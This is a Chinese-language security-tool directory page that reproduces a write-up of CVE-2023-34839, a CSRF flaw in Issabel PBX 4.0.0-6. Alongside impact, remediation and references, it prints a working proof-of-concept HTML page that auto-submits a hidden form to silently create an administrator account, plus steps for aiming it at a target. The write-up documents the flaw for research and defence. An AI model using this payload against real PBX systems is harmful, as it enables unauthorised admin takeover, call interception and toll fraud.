Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-34839 — CVE-2023-34839 是在 Issabel PBX 4.0.0-6 版本中发现的一个跨站请求伪造(CSRF)漏洞,Issabel PBX 是一个广泛使用的开源统一通信平台。 | Kitploit
工具/GitHubGitHub/sahiloj/cve-2023-34839
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试论文与研究学习与教育
GitHubsahiloj/cve-2023-34839

CVE-2023-34839

CVE-2023-34839 是在 Issabel PBX 4.0.0-6 版本中发现的一个跨站请求伪造(CSRF)漏洞,Issabel PBX 是一个广泛使用的开源统一通信平台。

查看仓库
5316个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-34839 — Issabel PBX 4.0.0-6:CSRF 导致权限提升

CVE Severity CVSS Affected Version


目录

  • 概述
  • 漏洞详情
  • 受影响软件
  • CVSS 评分
  • 攻击场景
  • 概念验证 (PoC)
  • 复现步骤
  • 影响
  • 修复建议
  • 参考资料
  • 免责声明

概述

CVE-2023-34839 是在 Issabel PBX 4.0.0-6 版本中发现的一个 跨站请求伪造 (CSRF) 漏洞。Issabel PBX 是一款广泛使用的开源统一通信平台。该漏洞存在于用户管理端点中,允许未经身份验证的远程攻击者通过诱使已认证的管理员访问特制网页,静默地创建一个新的管理员账户。


漏洞详情

Issabel PBX 4.0.0-6 在 用户创建 端点未实施 CSRF 保护(如同步令牌、SameSite cookie 属性或 Origin/Referer 头部验证):

root@kitploit:~
POST /index.php?menu=userlist&action=new

由于应用程序仅依赖会话 cookie 进行身份验证,并且不执行任何状态更改请求验证,因此来自任何来源的伪造 POST 请求都会被接受,并以登录管理员会话的全部权限进行处理。

根本原因: 管理端点上缺乏反 CSRF 令牌验证。

漏洞类型: CWE-352 — 跨站请求伪造 (CSRF)


受影响软件

软件版本状态
Issabel PBX4.0.0-6受影响 ✔
  • 厂商主页: https://www.issabel.org/
  • 源代码: https://github.com/IssabelFoundation/issabelPBX

CVSS 评分


攻击场景

攻击者可以通过以下高层步骤利用此漏洞:

  1. 构造恶意 HTML 页面,其中包含一个隐藏表单,目标为 Issabel PBX 用户创建端点,并带有攻击者控制的值(用户名、密码、组 = 管理员)。
  2. 托管恶意页面 在服务器上,或通过钓鱼邮件、聊天消息或任何社会工程手段发送给目标管理员。
  3. 等待管理员打开链接,同时其浏览器保持与 Issabel PBX 应用程序的活跃认证会话。
  4. 浏览器自动提交表单,利用受害者的现有会话 cookie,导致应用程序静默地创建一个新的管理员账户。
  5. 攻击者使用新创建的凭据登录,并获得对 PBX 系统的完全管理员访问权限,包括呼叫路由、录音、SIP 中继配置以及所有系统设置。

受害者只需访问一次页面,无需其他交互。


概念验证 (PoC)

⚠️ 仅用于教育和授权测试目的。
将 localhost 替换为目标 Issabel PBX 实例的主机名或 IP 地址。
如果针对使用自签名证书的 https:// 端点进行测试,必须先在相同浏览器中访问目标 URL 并接受证书警告;否则浏览器将阻止跨源表单提交。

root@kitploit:~
<html>
  <!-- CSRF 漏洞利用 — CVE-2023-34839 -->
  <body>
    <form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
      <input type="hidden" name="save"             value="Save" />
      <input type="hidden" name="name"             value="CSRF" />
      <input type="hidden" name="description"      value="CSRF 测试账户" />
      <input type="hidden" name="password1"        value="Test@123" />
      <input type="hidden" name="password2"        value="Test@123" />
      <input type="hidden" name="group"            value="1" />   <!-- 1 = 管理员 -->
      <input type="hidden" name="extension"        value="" />
      <input type="hidden" name="webmailuser"      value="" />
      <input type="hidden" name="webmaildomain"    value="" />
      <input type="hidden" name="webmailpassword1" value="" />
      <input type="hidden" name="id_user"          value="" />
      <input type="submit" value="提交请求" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

利用文件也在此仓库中提供:CSRF Exploit.html


复现步骤

先决条件

  • 一个正在运行的 Issabel PBX 4.0.0-6 实例。
  • 一个具有活跃浏览器会话的管理员账户。
  • 一个与管理会话相同的浏览器。

步骤 1 — 以管理员身份登录 Issabel PBX

导航到 Issabel PBX 网页界面,使用管理员凭据登录。

Issabel PBX 登录


步骤 2 — 准备 CSRF 利用代码

复制上面的 PoC HTML 代码,保存为 .html 文件,并将 localhost 替换为目标 Issabel 实例的实际主机名或 IP 地址。

该利用代码使用隐藏表单字段静默地向应用程序提交新的用户创建请求。页面加载时,嵌入的 JavaScript 会立即提交表单,无需任何可见的用户操作。

CSRF 利用 HTML


步骤 3 — 在相同浏览器中打开利用文件

在管理员会话仍然活跃的同一个浏览器中(新标签页)打开保存的 HTML 文件。页面加载后,表单将自动提交。


步骤 4 — 验证新管理员账户已创建

导航回 Issabel PBX 的 用户管理 面板。将创建一个新的用户账户(在此 PoC 中名为 CSRF),并具有完全的 管理员 权限——除打开利用页面外无需任何额外交互。

新管理员用户已创建


影响

成功利用 CVE-2023-34839 可使攻击者:

  • 在 PBX 系统上创建恶意管理员账户,获得持久的完全权限访问。
  • 修改呼叫路由和 SIP 中继,实现窃听或话费欺诈。
  • 访问语音邮件录音和呼叫详细记录 (CDR),导致敏感信息泄露。
  • 锁定合法管理员,通过更改密码或删除现有账户。
  • 中断通信,通过更改或删除 PBX 配置。

由于恶意账户在受害者会话结束后仍然存在,攻击者将无限期保留访问权限,直到该账户被发现并删除。


修复建议

Issabel PBX 管理员和开发者应应用以下缓解措施:

  1. 实施反 CSRF 令牌: 为每个状态更改表单生成唯一的、不可预测的、与会话绑定的令牌。在处理任何 POST 请求之前,在服务器端验证令牌。

  2. 在会话 cookie 上应用 SameSite=Strict 或 SameSite=Lax: 这指示浏览器不在跨站请求中发送 cookie,从而在现代浏览器中有效防止经典的 CSRF 攻击。

  3. 验证 Origin 和 Referer 头部: 拒绝其 Origin 或 Referer 头部与预期应用程序域不匹配的请求。

  4. 对敏感操作要求重新认证: 在允许创建新的管理员级别账户之前,提示管理员输入当前密码。

  5. 应用最新的安全补丁: 关注 Issabel 发布页面 和 官方仓库,以获取解决此 CVE 的补丁。


参考资料

  • NVD — CVE-2023-34839
  • OWASP — 跨站请求伪造 (CSRF)
  • CWE-352: 跨站请求伪造
  • Issabel 官方网站
  • IssabelFoundation/issabelPBX 在 GitHub 上

免责声明

本仓库 严格 用于 教育目的和授权安全研究。此处提供的信息和概念验证代码仅可用于您拥有或已获得明确书面许可进行测试的系统。未经授权将此漏洞利用于非您拥有的系统是 非法的,并可能导致刑事起诉。作者不对本仓库所含信息的任何滥用承担责任。

下载工具
字段值
CVE IDCVE-2023-34839
日期2023年6月23日
研究人员Sahil Ojha
厂商Issabel
产品Issabel PBX
版本4.0.0-6
测试环境Windows
指标值
CVSS v3.1 向量AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
基础评分8.8(高危)
攻击向量网络
攻击复杂度低
所需权限无
用户交互需要(管理员访问)
范围未改变
机密性高
完整性高
可用性高